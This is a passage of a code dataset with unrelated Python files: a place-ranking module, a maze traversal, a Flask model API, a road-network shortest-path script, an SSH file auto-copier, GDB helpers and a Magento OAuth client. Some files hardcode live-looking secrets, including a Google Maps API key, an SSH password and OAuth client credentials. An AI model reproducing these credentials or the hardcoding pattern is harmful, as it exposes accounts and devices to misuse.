exist.'\n\n def __init__(self, file_path):\n self.file_path = file_path\n\nclass DirectoryDoesNotExistError(BaseException):\n directory_path = None\n message = 'the directory \"{directory_path}\" does not exist.'\n\n def __init__(self, directory_path):\n self.directory_path = directory_path\n","sub_path":"exceptions/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"536103027","text":"import json, collections, googlemaps\nfrom lib.user import User\nfrom lib.place import Place\n\ngmaps = googlemaps.Client(key='AIzaSyATLldaqdgJdoExvEgme-93h6fuael2ae4')\n\n# Goal is what the user selected from the dropdown menu\n# Appropriate fairness function is called accordingly\ndef getRanking(places, goal):\n if goal == \"min-durations\":\n minimiseDurations(places)\n elif goal == \"min-distances\":\n minimiseDistances(places)\n elif goal == \"most-similar-durations\":\n places = mostSimilarDurations(places)\n elif goal == \"reasonably-similar-durations\":\n places = reasonablySimilarDurations(places)\n elif goal == \"duration-fair-similarity\":\n durationFairnessFunction(places, 3/4, 1/4)\n elif goal == \"duration-fair-total\":\n durationFairnessFunction(places, 1/4, 3/4)\n\n # Top ten results returned to server\n return places[0:10]\n\n\ndef minimiseDurations(places):\n # Sort in ascending order by minimum duration\n places.sort(key=lambda place: place.get_min_duration())\n # Sort in ascending order by maximum duration\n places.sort(key=lambda place: place.get_max_duration())\n # Sort in ascending order by total duration\n places.sort(key=lambda place: place.get_total_duration())\n\n\ndef minimiseDistances(places):\n # Sort in ascending order by minimum distance\n places.sort(key=lambda place: place.get_min_distance())\n # Sort in ascending order by maximum distance\n places.sort(key=lambda place: place.get_max_distance())\n # Sort in ascending order by total distance\n places.sort(key=lambda place: place.get_total_distance())\n\n\ndef mostSimilarDurations(places):\n # Sort in ascending order by total deviation\n places.sort(key=lambda place: place.get_duration_deviation())\n # Keep track of current deviation bracket\n current_deviation = 0\n sorted_places = []\n temp_places = []\n for place in places:\n if (place.get_duration_deviation() == current_deviation):\n # Collect all the places in a deviation bracket together\n temp_places.append(place)\n else:\n # Once they have all been collected, sort in ascending order\n # by minimum duration then maximum duration\n temp_places.sort(key=lambda place: place.get_min_duration())\n temp_places.sort(key=lambda place: place.get_max_duration())\n # Store the sorted list\n sorted_places.extend(temp_places)\n # Restart and repeat for the next deviation bracket\n temp_places = []\n current_deviation = place.get_duration_deviation()\n temp_places.append(place)\n # Sort the final temporary list\n temp_places.sort(key=lambda place: place.get_min_duration())\n temp_places.sort(key=lambda place: place.get_max_duration())\n sorted_places.extend(temp_places)\n # Return the final sorted list of places\n return sorted_places\n\n\n# Locations are ordered within their deviation brackets\ndef reasonablySimilarDurations(places):\n # Sort in ascending order by total deviation\n places.sort(key=lambda place: place.get_duration_deviation())\n # The range of the deviation bracket\n step = 10\n current_deviation_lower = 0\n current_deviation_upper = current_deviation_lower + step\n sorted_places = []\n temp_places = []\n for place in places:\n if (current_deviation_lower <= place.get_duration_deviation() <= current_deviation_upper):\n temp_places.append(place)\n else:\n temp_places.sort(key=lambda place: place.get_min_duration())\n temp_places.sort(key=lambda place: place.get_max_duration())\n sorted_places.extend(temp_places)\n temp_places = []\n current_deviation = place.get_duration_deviation()\n while current_deviation >= current_deviation_upper:\n current_deviation_lower = current_deviation_upper\n current_deviation_upper += step\n temp_places.append(place)\n temp_places.sort(key=lambda place: place.get_min_duration())\n temp_places.sort(key=lambda place: place.get_max_duration())\n sorted_places.extend(temp_places)\n return sorted_places\n\n\n# The fairness functions are applied\ndef durationFairnessFunction(places, alpha, beta):\n for place in places:\n total_deviation = place.get_duration_deviation()\n total_duration = place.get_total_duration()\n score = (alpha * total_deviation) + (beta * total_duration)\n place.set_duration_fairness_score(score)\n places.sort(key=lambda place: place.get_duration_fairness_score())\n\n","sub_path":"lib/ranking.py","file_name":"ranking.py","file_ext":"py","file_size_in_byte":4600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"628603572","text":"from room import Room\nfrom player import Player\nfrom world import World\n\nimport random\nfrom ast import literal_eval\n\n# Load world\nworld = World()\n\n\n# You may uncomment the smaller graphs for development and testing purposes.\n# map_file = \"maps/test_line.txt\"\n# map_file = \"maps/test_cross.txt\"\n# map_file = \"maps/test_loop.txt\"\n# map_file = \"maps/test_loop_fork.txt\"\nmap_file = \"maps/main_maze.txt\"\n\n# Loads the map into a dictionary\nroom_graph=literal_eval(open(map_file, \"r\").read())\nworld.load_graph(room_graph)\n\n# Print an ASCII map\nworld.print_rooms()\n\nplayer = Player(world.starting_room)\n\n# Fill this out with directions to walk\n# traversal_path = ['n', 'n']\n\n#for the path that's been traversed\ntraversal_path = []\n\n#dict for all rooms visited\nvisited = {}\n\n#path needed for keeping track of going back if get stuck\nback_path = []\n\n#we need to be able to go in the opposite direction if we run into a dead end and need to go back so we can keep exploring\nopp_dir = {'n':'s', 's':'n', 'w': 'e', 'e':'w'}\n\n#get current room id and the exits available\n#prints {0: ['n', 's', 'w', 'e']}\nvisited[player.current_room.id] = player.current_room.get_exits()\n\nprint(\"Starting search!\")\n\n#1) Find shortest path to an unexplored room\n#run while loop to check if visited is less than rooms available \nwhile len(visited) < len(room_graph) - 1:\n\n #check if the current room the player is in hasn't been added to visited\n if player.current_room.id not in visited:\n\n #add exits of the current room to rooms\n visited[player.current_room.id] = player.current_room.get_exits()\n\n #grab the last direction that was traveled \n last_direction = back_path[-1]\n\n #remove the last available directions from previous roo, so that new ones can be added with each room visit\n visited[player.current_room.id].remove(last_direction)\n print(f\"Available directions: {visited[player.current_room.id]}\")\n print(f\"Current room id: {player.current_room.id} \\n\")\n\n\n\n #2) Then find more available rooms \n\n #check if no more available rooms to visit or no more directions to go in (could be because of hitting dead end)\n while len(visited[player.current_room.id]) < 1:\n print(f\"Available directions: {visited[player.current_room.id]}\")\n #if so, then go back by popping it from the path \n print(\"\\nGoing back!\")\n back_dir = back_path.pop()\n\n print(f\"Current room id: {player.current_room.id}\")\n\n #append the back direction to traversal_path so it can travel in that direction (we're able to find room with an available direction to travel)\n traversal_path.append(back_dir)\n print(f\"Traveling {traversal_path[-1]} to take you back a room\")\n\n #now we need to give the player the ability to travel in that direction\n player.travel(back_dir)\n\n\n\n #while there are avail. directions, go in the first direction avail. in room\n find_exit = visited[player.current_room.id].pop(0)\n\n # print(f\"Current room id: {player.current_room.id}\")\n print(f\"Current room: {player.current_room.id} Going in this direction to find an exit :{find_exit}\")\n\n #add these directions to traversal path\n traversal_path.append(find_exit)\n\n #append the opposite direction to the path used for back tracking\n back_path.append(opp_dir[find_exit])\n print(f\"Opposite direction of current direction: {opp_dir[find_exit]} \\n\")\n\n #move the player to find the exit\n player.travel(find_exit)\n\n\n# print(world.print_rooms())\nprint(\"Congratulations, you're done!\\n\\n\")\n\n\n\n#Write algo that picks random unexplored direction from current_room\n#travels and logs that direction\n#loop\n#should cause player to walk in dft(?)\n\n#Can find the path to shortest unexplored room by using bfs for a room with ? for an exit\n#If using bfs from homework make modifications\n#Instead of searching for target vertex, search for an exit with a ? as the value\n#If exit has been explored, \n #can put it in bfs queue like normal\n#Bfs will return the path as a list of room IDs\n #Will need to convert this to a list of n/s/e/w directions before you can add it to your traversal path\n#If all paths explored, done\n\n#DFT until a dead end is reached\n#BFS to the nearest unexplored room\n\n\n\n\n\n\n# TRAVERSAL TEST\nvisited_rooms = set()\nplayer.current_room = world.starting_room\nvisited_rooms.add(player.current_room)\n\nfor move in traversal_path:\n player.travel(move)\n visited_rooms.add(player.current_room)\n\nif len(visited_rooms) == len(room_graph):\n print(f\"TESTS PASSED: {len(traversal_path)} moves, {len(visited_rooms)} rooms visited\")\nelse:\n print(\"TESTS FAILED: INCOMPLETE TRAVERSAL\")\n print(f\"{len(room_graph) - len(visited_rooms)} unvisited rooms\")\n\n\n\n#######\n# UNCOMMENT TO WALK AROUND\n#######\n# player.current_room.print_room_description(player)\n# while True:\n# cmds = input(\"-> \").lower().split(\" \")\n# if cmds[0] in [\"n\", \"s\", \"e\", \"w\"]:\n# player.travel(cmds[0], True)\n# elif cmds[0] == \"q\":\n# break\n# else:\n# print(\"I did not understand that command.\")\n","sub_path":"adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"389580014","text":"def main():\n print(\"NÚMEROS POSITIVOS\")\n numeros=int(input(\"Escriba la cantidad de numeros positivos a escribir: \"))\n positivos=0\n negativos=0\n while numeros<=0:\n numeros=int(input(\"La cantidad debe ser mayor que 0. Intentelo de nuevo: \"))\n\n for _ in range(1, numeros+1):\n numero=int(input(\"Escriba un numero: \"))\n\n if numero>0:\n positivos=positivos+1\n else:\n negativos=negativos+1\n if negativos==0:\n print(f\"Ha escrito {positivos} numeros positivos\")\n elif positivos==0:\n print(f\"Ha escrito {negativos} numeros negativos\")\n else:\n print(f\"Ha escrito {positivos} numeros positivos y {negativos} numeros negativos de un total de {numeros}\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bucle while 1/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"274532801","text":"import json\nimport logging\nfrom flask import Flask, request, jsonify\n\nfrom sgnlp.models.lif_3way_ap import LIF3WayAPModel, LIF3WayAPConfig, LIF3WayAPPreprocessor\nfrom transformers import cached_path\n\napp = Flask(__name__)\n\ngunicorn_logger = logging.getLogger('gunicorn.error')\napp.logger.handlers = gunicorn_logger.handlers\napp.logger.setLevel(gunicorn_logger.level)\n\n# Load model\nconfig = LIF3WayAPConfig.from_pretrained('https://sgnlp.blob.core.windows.net/models/lif_3way_ap/config.json')\nmodel = LIF3WayAPModel.from_pretrained('https://sgnlp.blob.core.windows.net/models/lif_3way_ap/pytorch_model.bin',\n config=config)\nmodel.eval()\n\n# Load preprocessor\nword_vocab_path = cached_path('https://sgnlp.blob.core.windows.net/models/lif_3way_ap/word_vocab.pt')\nchar_vocab_path = cached_path('https://sgnlp.blob.core.windows.net/models/lif_3way_ap/char_vocab.pt')\n\npreprocessor = LIF3WayAPPreprocessor(min_word_padding_size=config.char_embedding_args[\"kernel_size\"])\npreprocessor.load_vocab(word_vocab_path, char_vocab_path)\n\napp.logger.info('Initialization complete.')\n\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n req_body = request.get_json()\n tensor_dict = preprocessor([req_body])\n output = model(**tensor_dict)\n return {\"probability\": output[\"label_probs\"].item()}\n\n\nmodel_card_path = \"model_card/lif_3way_ap.json\"\n\n\n@app.route(\"/model-card\", methods=[\"GET\"])\ndef get_model_card():\n \"\"\"GET method for model card\n\n Returns:\n json: return model card in json format\n \"\"\"\n with open(model_card_path) as f:\n model_card = json.load(f)\n return jsonify(**model_card)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n","sub_path":"demo_api/lif_3way_ap/model_api.py","file_name":"model_api.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"83101685","text":"#!/usr/bin/env python3\nimport os\nimport sys\nimport sandbox\nimport file\nimport langSupport\nfrom judge import JudgeResult\n\ndef OJRun():\n lPlayers = file.listOfPlayers()\n lProblems = file.listOfProblems()\n\n for thisPlayer in lPlayers:\n relaPath = file.getPlayerDirectory(thisPlayer)\n if not os.path.isdir(relaPath):\n print(\"Ignored %s: Not a directory.\" % thisPlayer)\n continue\n lSources = file.listOfPlayerSources(thisPlayer)\n for thisSource in lSources:\n sourceRelaPath = relaPath + thisSource\n filename, fileExtension = os.path.splitext(thisSource)\n if not os.path.isfile(sourceRelaPath):\n print(\"Ignored %s: Not a file.\" % sourceRelaPath)\n continue\n elif not langSupport.langType(fileExtension.lower()):\n print(\"Ignored %s: Unsupported file extension.\" % sourceRelaPath)\n continue\n elif not filename in lProblems:\n print(\"Ignored %s: Cannot find Problem %s.\" % (sourceRelaPath, filename))\n continue\n config = file.loadProblemConfig(filename)\n res = sandbox.safeJudge(filename, fileExtension, relaPath, config)\n print('{} on {}: {}'.format(thisPlayer, config['title'], res))\n\ndef OJReset():\n file.cleanupWorkspace()\n\nif __name__ == '__main__':\n if len(sys.argv) >= 2:\n if sys.argv[1] == 'cleanup':\n OJReset()\n exit(0)\n OJRun()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"401529644","text":"import pandas as pd\npd.set_option('display.max_rows', 500)\n\n#Parse my input file\nclass Parse:\n #Open File ##To Do: Find out how to take in multiple files for scalability\n def open_file(file_name):\n with open(file_name, 'r', errors=\"replace\") as file:\n df = pd.read_csv(file_name, encoding='utf-8')\n\n # Timestamp ##For right now, this converts all timezones to est. need to learn how to only do missing timezone info\n df['Timestamp'] = pd.to_datetime(df['Timestamp'])\n df['Timestamp'] = df['Timestamp'].dt.tz_localize('UTC')\n df['Timestamp'] = df['Timestamp'].dt.tz_convert('EST')\n\n # Converts ZIP(zipcodes) to 5 digits with leading Zeros\n df['ZIP'] = df['ZIP'].apply(lambda x: '{0:0>5}'.format(x))\n\n # Converts FullName to Uppercase\n df['FullName'] = df['FullName'].str.upper()\n\n #To do: Remove Quotes in Address\n #df['Address'] = df['Address'].apply(lambda x: x.replace('\"', ''))\n #df['Address'] = df['Address'].str.replace('\"\"', '')\n\n #To Do: FooDuration & BarDuration to floating seconds\n\n #To Do: Remove Total Duration = Sum of FooDuration & BarDuration\n\n #Write File ##To Do: Make output file match input file name\n df.to_csv('out.csv', index=False)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"576298383","text":"\"\"\"\nAssorted utilities for HHVM GDB bindings.\n\"\"\"\n# @lint-avoid-python-3-compatibility-imports\n# @lint-avoid-pyflakes3\n# @lint-avoid-pyflakes2\n\nimport collections\nimport functools\nimport gdb\n\n\n#------------------------------------------------------------------------------\n# Memoization.\n\ndef memoized(func):\n \"\"\"Simple memoization decorator that ignores **kwargs.\"\"\"\n\n cache = {}\n\n @functools.wraps(func)\n def memoizer(*args):\n if not isinstance(args, collections.Hashable):\n return func(*args)\n if args not in cache:\n cache[args] = func(*args)\n return cache[args]\n return memoizer\n\n\n#------------------------------------------------------------------------------\n# General-purpose helpers.\n\ndef parse_argv(args):\n return [gdb.parse_and_eval(arg) for arg in gdb.string_to_argv(args)]\n\n\ndef gdbprint(val, ty=None):\n if ty is None:\n ty = val.type\n gdb.execute('print (%s)%s' % (str(ty), str(val)))\n\n\n#------------------------------------------------------------------------------\n# String helpers.\n\n\ndef string_data_val(val):\n return val['m_data'].string('utf-8', 'ignore', val['m_len'])\n\n\ndef vstr(value):\n \"\"\"Stringify a value without pretty-printing.\"\"\"\n\n for pp in gdb.pretty_printers:\n try:\n pp.saved = pp.enabled\n except AttributeError:\n pp.saved = True\n\n pp.enabled = False\n\n try:\n ret = unicode(value)\n except:\n ret = str(value)\n\n for pp in gdb.pretty_printers:\n pp.enabled = pp.saved\n\n return ret\n\n\n#------------------------------------------------------------------------------\n# Caching lookups.\n\n@memoized\ndef T(name):\n return gdb.lookup_type(name)\n\n@memoized\ndef V(name):\n return gdb.lookup_symbol(name)[0].value()\n\n@memoized\ndef K(name):\n return gdb.lookup_global_symbol(name).value()\n\n\n#------------------------------------------------------------------------------\n# Type manipulations.\n\ndef template_type(t):\n \"\"\"Get the unparametrized name of a template type.\"\"\"\n return str(t).split('<')[0]\n\n\ndef is_ref(t):\n \"\"\"Return whether a type `t' is a C++ pointer or reference type.\"\"\"\n return (t.code == gdb.TYPE_CODE_PTR or\n t.code == gdb.TYPE_CODE_REF)\n\n\ndef deref(val):\n \"\"\"Fully dereference a value, stripping away *, &, and all known smart\n pointer wrappers (as well as const/volatile qualifiers).\"\"\"\n\n while True:\n t = val.type.unqualified().strip_typedefs()\n\n if is_ref(t):\n val = val.referenced_value()\n continue\n\n name = template_type(t)\n\n if name == \"HPHP::LowPtr\" or name == \"HPHP::LowPtrImpl\":\n inner = t.template_argument(0)\n val = val['m_raw'].cast(inner.pointer()).dereference()\n continue\n\n if name == \"HPHP::SmartPtr\" or name == \"HPHP::AtomicSmartPtr\":\n val = val['m_px'].dereference()\n continue\n\n return val\n","sub_path":"hphp/tools/gdb/gdbutils.py","file_name":"gdbutils.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"421457905","text":"import sys\nimport os\nimport socket\nimport subprocess\nimport argparse\nfrom pexpect import popen_spawn, EOF\nfrom datetime import datetime\nfrom watchdog.observers import Observer\nfrom watchdog.events import PatternMatchingEventHandler\nfrom ssh2.session import Session\nfrom time import sleep\n\nclass AutoCopier:\n\n def __init__(self):\n self.source = \"\"\n self.dest = \"\"\n self.basename = \"\"\n self._parse_commands()\n\n def _parse_commands(self):\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-fe\", \"--force-execution\", type=str, help=\"After a file change\" +\n \"is detected, \", action=\"store\")\n parser.add_argument(\"watchdir\", help=\"Directory to watch for changes\")\n parser.add_argument(\"targetdir\", help=\"Directory where changed files are copied to\")\n # parser.add_argument(\"host\", help=\"Remote device to connect to\")\n if len(sys.argv) != 3:\n print(\"Invalid input\\n\")\n quit()\n\n self.source = sys.argv[1]\n self.dest = sys.argv[2]\n\n if not os.path.exists(self.source):\n print(\"Directory not found\\n\")\n quit()\n\n if self.source == \".\":\n self.source = os.getcwd()\n\n if self.source[-1] == \"\\\\\" or self.source[-1] == \"/\":\n self.source = self.source[:len(self.source) - 1]\n\n if not self.dest.endswith(\"/\") and not self.dest.endswith(\":\"):\n self.dest += \"/\"\n\n self.basename = os.path.split(self.source)[1]\n\n print(\"Source path: %s, Dest path: %s, Directory basename: %s\" %\n (self.source, self.dest, self.basename))\n\n def run(self):\n event_handler = Handler(self.basename, self.dest, patterns=[\"*.py\"],\n ignore_patterns=[\"*.py___jb_old___\", \"*.py___jb_temp___\"])\n\n observer = Observer()\n observer.schedule(event_handler, self.source)\n observer.start()\n\n try:\n while True:\n sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n\n observer.join()\n\n\n\nclass Handler(PatternMatchingEventHandler):\n \"\"\"Event handler for observer.\"\"\"\n\n def __init__(self, basename, dest, patterns=None, ignore_patterns=None):\n self.last_time = 0\n self.most_recent_time = 0\n self.last_path = \"\"\n self.most_recent_path = \"\"\n self.basename = basename\n self.dest = dest\n self.sm = SessionManager()\n\n PatternMatchingEventHandler.__init__(self, patterns, ignore_patterns)\n\n def on_created(self, event):\n print(\"Detected file creation: Path: %s\\n\" % event.src_path)\n\n def on_modified(self, event):\n self.most_recent_time = os.stat(event.src_path).st_mtime\n self.most_recent_path = event.src_path\n\n print(\"Last modification: %d, Most recent modification: %d\" %\n (self.last_time, self.most_recent_time))\n\n # Account for possible duplicate modification events but allow detection\n # of more than one file changing in watch cycle\n if self.last_path != self.most_recent_path or \\\n (self.last_path == self.most_recent_path and\n self.most_recent_time - self.last_time > .5):\n\n rel_path = self._get_rel_path(event.src_path)\n\n print(\"Detected file modification:\\n\\tPath: %s\\n\\tRelative Path: %s\"\n % (event.src_path, rel_path))\n\n self.copy_file(event.src_path, self.dest, rel_path)\n\n self.last_time = self.most_recent_time\n self.last_path = self.most_recent_path\n\n\n\n def on_deleted(self, event):\n print(\"Detected file deletion:\\n\\tPath: %s\\n\" % event.src_path)\n\n def on_moved(self, event):\n\n if len(event.src_path) > len(event.dest_path):\n diff = event.src_path.replace(event.dest_path, \"\")\n else:\n diff = event.dest_path.replace(event.src_path, \"\")\n\n # print(\"Diff between paths: %s\\n\" % diff)\n\n if diff != \"___jb_tmp___\" and diff != \"___jb_old___\":\n\n print(\"Detected moved/renamed file:\\n\\tOld path: %s\\n\\tNew path: %s\\n\" %\n (event.src_path, event.dest_path))\n\n def _get_rel_path(self, event_source_path):\n rel_path = event_source_path.partition(self.basename)[2]\n rel_path = rel_path.replace(\"\\\\\\\\\", \"/\")\n rel_path = rel_path.replace(\"\\\\\", \"/\")\n\n if rel_path.startswith(\"/\"): rel_path = rel_path[1:]\n\n return rel_path\n\n def copy_file(self, source_path, dest_path, rel_path):\n\n cmd = \"scp %s %s%s\\n\" % (source_path, dest_path, rel_path)\n print(cmd)\n\n # ------------------------------------------------\n # ------------------------- With PSCP ------------\n # ------------------------------------------------\n\n # pscp_path = \"C:\\Program Files\\PuTTY\\pscp.exe\"\n # dest_full_path = dest_path + rel_path\n # subprocess.call([pscp_path, \"-sftp\", \"-pw\", \"maker\", source_path,\n # dest_full_path])\n\n # ------------------------------------------------\n # --------------------- With SSH2 ----------------\n # ------------------------------------------------\n\n self.sm.scp(source_path, dest_path + rel_path)\n\n\n\nclass SessionManager:\n \"\"\"Opens an SSH session\"\"\"\n\n def __init__(self):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((\"ev3dev\", 22))\n\n self.session = Session()\n self.session.handshake(sock)\n self.session.userauth_password(\"robot\", \"maker\")\n self.session.keepalive_config(True, 60)\n\n def run_remote_cmd(self, cmd):\n chan = self.session.open_session()\n chan.execute(cmd)\n\n # Read output\n output = \"\"\n size, data = chan.read()\n while size > 0:\n output += data.decode('utf-8')\n print(data.decode('utf-8'))\n size, data = chan.read()\n\n sig, err, lang_tag = chan.get_exit_signal()\n print(err.decode('utf-8'))\n\n chan.close()\n\n return sig, output\n\n def scp(self, src_path, dest_path):\n\n fileinfo = os.stat(src_path)\n\n chan = self.session.scp_send64(dest_path, fileinfo.st_mode & 0o777, fileinfo.st_size,\n fileinfo.st_mtime, fileinfo.st_atime)\n\n # Output Stats\n now = datetime.now()\n with open(src_path, 'rb') as local_fh:\n for data in local_fh:\n chan.write(data)\n taken = datetime.now() - now\n rate = (fileinfo.st_size / 1024000.0) / taken.total_seconds()\n print(\"Finished writing %s to remote in %s | %.4f. MB/s\" %\n (dest_path, taken, rate))\n\n chan.close()\n\n def disconnect(self):\n self.session.disconnect()\n\n\nif __name__ == \"__main__\":\n\n auto_copier = AutoCopier()\n auto_copier.run()\n\n\n\n","sub_path":"AutoCopy.py","file_name":"AutoCopy.py","file_ext":"py","file_size_in_byte":6889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"14049989","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf.urls import include, url\n\nfrom . import views\n\napp_name = 'reservas'\nurlpatterns = [\n \n url(r'^$', views.index, name = 'index'),\n url(r'^login/$', views.the_login, name = 'the_login'),\n url(r'^logout/$', views.the_logout, name = 'the_logout'),\n url(r'^reservar/$', views.reservar, name = 'reservar'),\n url(r'^lista/$', views.lista, name = 'lista'),\n url(r'^lista/json/$', views.lista_json, name = 'lista_json'),\n url(r'^reserva/ver/(?P.*)$', views.ver_reserva, name = 'ver_reserva'),\n url(r'^reserva/imprimir/(?P.*)$', views.imprimir_reserva, name = 'imprimir_reserva'),\n url(r'^reserva/print/(?P[\\w\\-]+)/$', views.imprimir_reserva_compra, name='imprimir_reserva_compra'),\n url(r'^cliente/$', views.cliente, name = 'cliente'),\n \n url(r'^informe/cliente/$', views.informe_cliente, name = 'informe_cliente'),\n url(r'^informe/cliente/traer/$', views.informe_cliente_traer, name = 'informe_cliente_traer'),\n url(r'^informe/servicios/$', views.informe_servicios, name = 'informe_servicios'),\n url(r'^informe/servicios/traer/$', views.informe_servicios_traer, name = 'informe_servicios_traer'),\n url(r'^informe/servicios/seleccionar/$', views.informe_servicios_seleccionar, name = 'informe_servicios_seleccionar'),\n url(r'^informe/servicios/seleccionados/$', views.informe_servicios_seleccionados, name = 'informe_servicios_seleccionados'),\n url(r'^informe/adicional/$', views.informe_adicional, name = 'informe_adicional'),\n url(r'^informe/adicional/traer/$', views.informe_adicional_traer, name = 'informe_adicional_traer'),\n\n]\n","sub_path":"reservas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"166511628","text":"#script for analysing shortes paths from all nodes in road network of Canton Zurich to Zurich main central station\nimport pandas as pd\nimport networkx as nx\n\n#general workspace settings\nmyworkspace=\"C:/DATA/develops/zh\"\nroadstable=myworkspace+\"/zhroads.csv\"\n\n#create a csv file for nodes and edges\nnodesfile=open(myworkspace+\"/nodes.csv\",\"w\")\nedgesfile=open(myworkspace+\"/edges.csv\",\"w\")\nnodesfile.write(\"nodeid\"+\";\"+\"x\"+\";\"+\"y\"+\"\\n\")\nedgesfile.write(\"edgeid\"+\";\"+\"nodeid1\"+\";\"+\"nodeid2\"+\";\"+\"length\"+\"\\n\")\nnodesdistancesfile=open(myworkspace+\"/nodesdistances.csv\",\"w\")\nnodesdistancesfile.write(\"nodeid\"+\";\"+\"x\"+\";\"+\"y\"+\";\"+\"distancetoZHsbb\"+\"\\n\")\n\n#read the roads table\nroadsdf=pd.read_csv(roadstable, delimiter=\";\")\n\n#loop through roads dataframe and create a list of nodes and a list of edges\nnodescoordinateslist=[]\nnodesidlist=[]\nedgeslist=[]\nnodescounter=0\n\n#create graph\nG = nx.Graph()\n\nfor index, row in roadsdf.iterrows():\n if row.ID_Road not in edgeslist:\n edgeslist.append(row.ID_Road)\n xstart = row.BeginX\n ystart = row.BeginY\n xend = row.EndX\n yend = row.EndY\n length = row.SHAPE_Leng\n nodeidstart=0\n nodeidend=0\n #check if node coordinates are not counted twice\n if [xstart, ystart] not in nodescoordinateslist:\n nodescoordinateslist.append([xstart, ystart])\n nodescounter+=1\n nodesidlist.append(nodescounter)\n nodeidstart=nodescounter\n nodesfile.write(str(nodeidstart) + \";\" + str(xstart) + \";\" + str(ystart) + \"\\n\")\n G.add_node(nodeidstart, pos=(xstart, ystart))\n else:\n nodeidstart=nodesidlist[nodescoordinateslist.index([xstart, ystart])]\n G.add_node(nodeidstart, pos=(xstart, ystart))\n if [xend, yend] not in nodescoordinateslist:\n nodescoordinateslist.append([xend, yend])\n nodescounter += 1\n nodesidlist.append(nodescounter)\n nodeidend = nodescounter\n nodesfile.write(str(nodeidend) + \";\" + str(xend) + \";\" + str(yend) + \"\\n\")\n G.add_node(nodeidend, pos=(xend, yend))\n else:\n nodeidend=nodesidlist[nodescoordinateslist.index([xend, yend])]\n G.add_node(nodeidend, pos=(xend, yend))\n #add the road segment to the graph\n edgesfile.write(str(row.ID_Road)+\";\"+str(nodeidstart)+\";\"+str(nodeidend)+\";\"+str(length)+\"\\n\")\n edgeslist.append([row.ID_Road,nodeidstart,nodeidend,length])\n G.add_edge(nodeidstart, nodeidend, weight=length)\nnodesfile.close()\nedgesfile.close()\nprint(\"network graph created ...\")\n\n#G.clear()\n\n#target is main railway station in Zurich = node_id 76266\ntargetnode=72356\n\n#calculate shortest path for each node\ni=0\nwhile i int:\n \"\"\"\n Return a number of reqyests of per day.\n \"\"\"\n url = 'https://api.vk.com/method/newsfeed.search'\n params = {\n 'access_token': os.getenv('TOKEN'),\n 'v': '5.95',\n 'q': query,\n 'start_time': start_time,\n 'end_time': end_time\n }\n response = requests.get(url, params=params)\n return response.json()['response']['total_count']\n\n\ndef get_statistic_per_period(timestamps_list, query) -> list:\n \"\"\"\n Return a list with the number of requests for each day.\n \"\"\"\n return [(date, get_statistic_per_day(day_timestamp_start, day_timsetamp_end, query)) for\n date, day_timestamp_start, day_timsetamp_end in timestamps_list]\n\n\ndef get_day_timestaps(year, month, day) -> tuple:\n \"\"\"\n Return a tuple with timestamps of start of day and end of day.\n \"\"\"\n time_delta = datetime.timedelta(days=1)\n day_start = datetime.datetime(year, month, day)\n day_end = day_start + time_delta\n return day_start.timestamp(), day_end.timestamp()\n\n\ndef get_period(n=7) -> list:\n \"\"\"\n Return a list of date class with last N days.\n \"\"\"\n today = datetime.date.today()\n days = []\n\n for n in range(1, n + 1): # Чтобы получить статистику за последние 7 дней, начиная со вчера\n time_delta = datetime.timedelta(days=n)\n day = today - time_delta\n days.append(day)\n\n return days\n\n\ndef get_period_timestamps(period) -> list:\n \"\"\"\n Return a list with timestamps of each day in period.\n \"\"\"\n return [(day, *get_day_timestaps(day.year, day.month, day.day)) for day in period]\n\n\ndef create_graph(statistic: list, name, auto_open=True) -> str:\n \"\"\"\n Generate a graph and return the link to this schedule.\n \"\"\"\n trace1 = [go.Bar(\n x=[date.day for date, count in statistic],\n y=[count for date, count in statistic],\n name=name\n )]\n link = plotly.offline.plot(trace1, filename=f'{name}.html', auto_open=auto_open)\n return link\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Create a schedule with the frequency of the request.')\n parser.add_argument('query', help='Qeury for search.')\n parser.add_argument('period', help='Period for search.', type=int)\n args = parser.parse_args()\n\n period = get_period(args.period)\n period_timestamps = get_period_timestamps(period)\n statistic = get_statistic_per_period(period_timestamps, args.query)\n create_graph(statistic, args.query)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"179581681","text":"from requests_oauthlib import OAuth1 as OAuth\nimport requests\nimport sys\nimport simplejson\nfrom time import time\n\n# Reference: http://devdocs.magento.com/guides/m1x/api/rest-api-index.html\n# Reference GET Filters: http://devdocs.magento.com/guides/m1x/api/rest/get_filters.html\n\n# Parameters\nclient_key = u'd5b2c6073e14ea2844952b287c94d934'\nclient_secret = u'5269ac0f1d7b9f191332a00096f82d66'\nresource_owner_key = 